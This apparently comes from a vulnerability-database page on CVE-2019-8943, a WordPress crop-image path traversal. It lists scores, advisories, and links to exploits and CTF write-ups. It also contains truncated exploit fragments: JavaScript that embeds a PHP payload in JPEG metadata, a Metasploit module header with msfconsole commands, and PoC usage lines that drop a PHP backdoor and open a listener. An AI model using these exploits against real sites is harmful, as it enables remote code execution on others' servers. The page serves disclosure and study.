6.5
CVSSv3

CVE-2019-8943

Published: 20/02/2019 Updated: 23/02/2021
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
CVSS v3 Base Score: 6.5 | Impact Score: 3.6 | Exploitability Score: 2.8
VMScore: 455
Vector: AV:N/AC:L/Au:S/C:N/I:P/A:N

Vulnerability Summary

WordPress up to and including 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

wordpress wordpress

Vendor Advisories

Debian Bug report logs - #923583 wordpress: CVE-2019-8943 Package: src:wordpress; Maintainer for src:wordpress is Craig Small <csmall@debianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Sat, 2 Mar 2019 13:15:04 UTC Severity: important Tags: security, upstream Found in version wordpress/503+df ...
WordPress through 503 allows Path Traversal in wp_crop_image() An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and / sequences, such as a filename ending with the jpg?///filejpg substring ...

Exploits

var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<?php phpinfo();/*'; var cmdlen = cmdlength var payload = '\xff\xd8\xff\xed\x004Photoshop 30\x008BIM\x04\x04'+'\x00'repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x0 ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super(update_info( ...

Metasploit Modules

WordPress Crop-image Shell Upload

This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post. This exploit module only works for Unix-based systems currently.

msf > use exploit/multi/http/wp_crop_rce
      msf exploit(wp_crop_rce) > show targets
            ...targets...
      msf exploit(wp_crop_rce) > set TARGET <target-id>
      msf exploit(wp_crop_rce) > show options
            ...show and set options...
      msf exploit(wp_crop_rce) > exploit

Github Repositories

recon set blogthm into /etc/hosts nmap SMB 發現有開啟SMB,嘗試枚舉 smbclient -L 101014208 發現有資料夾共享,叫做"BillySMB" smbclient //101014208/BillySMB 進入後直接dump下來 prompt off mget * 檢查圖片檔是否有用隱寫術 steghide --info 檔名 發現有但直接告訴你是兔子洞,還是把

WEB02 WHITEHAT 30 Bài này dựa trên lỗ hổng của wordpress bản 500(CVE-2019-8943) Qua bài này có lẽ mọi người sẽ thấy được tầm quan trọng của việc chơi CTF Có người bảo CTF không thực tế không nên tốn thời gian vào nó CTF đúng chỉ là

CVE-2019-8943 WordPress Crop-Image

WordPress Crop-Image CVE-2019-8943 A python3 script for WordPress Crop-Image CVE-2019-8943 Authenticated Remote Code Execution (RCE) It drops a malicious PHP backdoor Getting Started Executing program RCE python3 wp_rcepy -t wordpressrce/ -u admin -p password -m twentytwenty Help For help menu: python3 wp_rcepy -h

THM Medium CTF

Blog Writeup (Tryhackme) - by yag1n3 Room Info Room Labels CVE-2019-8943 Wordpress Blog Web Room Objetives Roottxt Usertxt Where was usertxt found? What CMS was Billy using? What version of the above CMS was being used? Reconnaissance Nmap A Wordpress site and some Samba Samba We use enum4linux to retrieve some information We are able to access the share BillySMB wi

A simple PoC for WordPress RCE (author priviledge), refer to CVE-2019-8942 and CVE-2019-8943.

Summary A simple PoC for WordPress RCE (author priviledge), refer to CVE-2019-8942 and CVE-2019-8943 Affected Version WordPress &lt;= 498 (verified) WordPress &lt;= 500 Test Environment Docker Image docker pull avfisherdocker/wordpress:498 docker run -d -p 80:80 avfisherdocker/wordpress:498 Mysql &amp; WordPress Info Type Username Password mysql

WordPress 500 Crop-image Remote Code Execution Description The exploit code leverages the CVE-2019-8943 and CVE-2019-8942 vulnerabilities to gain remote code execution on WordPress 500 and &lt;= 498 Usage root@kali:~# python3 pocpy --url mysitecom -u kwheel -p qwerty -lhost 101062 -lport 443 [*] Authenticating to wordpress [+] Login successful [*] Uploadi

cve-2019-8942, cve-2019-8943

WordPress Image CROP RCE 분석 보고서 POC &amp; Dockekfile : githubcom/synod2/WP_CROP_RCE 본 문서에서는 Wordpress 499 및 501 이전 버전에서 발견된 취약점으로써, WordPress Image CROP RCE로 알려진 CVE-2019-8942와 CVE-2019-8943에 대해 다룬다 CVE 번호 공개일 설명 CVE-2019-8942 2019-2-19 wp_postmeta 테이블 값을

WordPress 500 Crop-image Remote Code Execution Description The exploit code leverages the CVE-2019-8943 and CVE-2019-8942 vulnerabilities to gain remote code execution on WordPress 500 and &lt;= 498 Installation git clone githubcom/ret2x-tools/poc-wordpress-500git pip install -r requirementstxt Usage root@parrot:~#

Exploit of CVE-2019-8942 and CVE-2019-8943

CVE-2019-8943 WordPress 500 - Image Remote Code Execution Exploit of CVE-2019-8942 and CVE-2019-8943 using python : ExploitDB : wwwexploit-dbcom/exploits/49512 The original exploit for metasploit : WordPress Core 500 - Crop-image Shell Upload (Metasploit) : wwwexploit-dbcom/exploits/46662 video : Description: The video below demonstrates how an attacker

CVE-2019-8942 and CVE-2019-8943: WordPress RCE (author priviledge) Tổng quan CVE-2019-8942 là lỗ hổng lợi dụng lỗi LFI kết hợp tính năng File Upload để thực hiện RCE đến máy chủ web Wordpress với quyền author Các phiên bản Wordpress bị ảnh hưởng bao gồm trước 499 và 5x tới trước 50

Some exploits I have written to showcase and to share

exploits Some exploits I have written to showcase and to share All exploits are for vulnerabilities that have been fixed for months prior to release and are not meant to be used for exploitation in any way, but for educational purposes only Here is the list of the exploits you can find here: CVE Software Impact Write-Up CVE-2021-27889+CVE-2021-27890 MyBB XSS to RCE htt

Embark on my CTFs Journey, where I document my conquests and lessons learned while navigating the dynamic challenges of Capture The Flag contests. From cracking codes to outsmarting puzzles, join me in exploring the diverse landscape of cybersecurity challenges.

Description Welcome to my personal Capture The Flags (CTFs) repository! This repository is created to track my progress, achievements, and detailed notes regarding cybersecurity challenges, especially on popular platforms like TryHackMe, Hack The Box and Rootme Contents This repository contains an organized list of CTF Machines that I have successfully exploited Each entry in

Desarrollo del CTF DerpNStink

DerpNStink Desarrollo del CTF DerpNStink 1 Configuración de la VM Download la VM: wwwvulnhubcom/entry/derpnstink-1,221/ 2 Escaneo de Puertos # Nmap 791 scan initiated Wed Apr 21 17:14:59 2021 as: nmap -n -P0 -p- -sC -sV -O -T5 -oA full 19216856105 Nmap scan report for 19216856105 Host is up (000072s latency) Not shown: 65532 closed ports PORT STA

WordPress Pen Testing

Project - WordPress Pen Testing Time spent: 16 hours spent in total Objective: Find, analyze, recreate, and document five vulnerabilities affecting an old version of WordPress Pen Testing Report 1 WordPress &lt;= 42 - Unauthenticated Stored Cross-Site Scripting (XSS) Summary: Vulnerability types: Cross-Site Scripting (XSS) Tested in version: 420 Fixed in versi

安全类各家文库大乱斗

SecBooks 各大文库公众号文章收集,部分文库使用gitbook部署;部分公众号使用杂散文章为主。 使用插件 "hide-element", "back-to-top-button", "-lunr", "-search", "search-pro", "splitter" #目录自动生成插件(book sm) npm install -g gitbook-summ

PoC in GitHub 2021 CVE-2021-1056 (2021-01-07) NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidiako) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure pokerfaceSad/CVE-2021-1056 CVE-2021-

PoC in GitHub 2020 CVE-2020-0014 (2020-02-13) It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android

PoC in GitHub 2020 CVE-2020-0014 It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android ID: A-1286745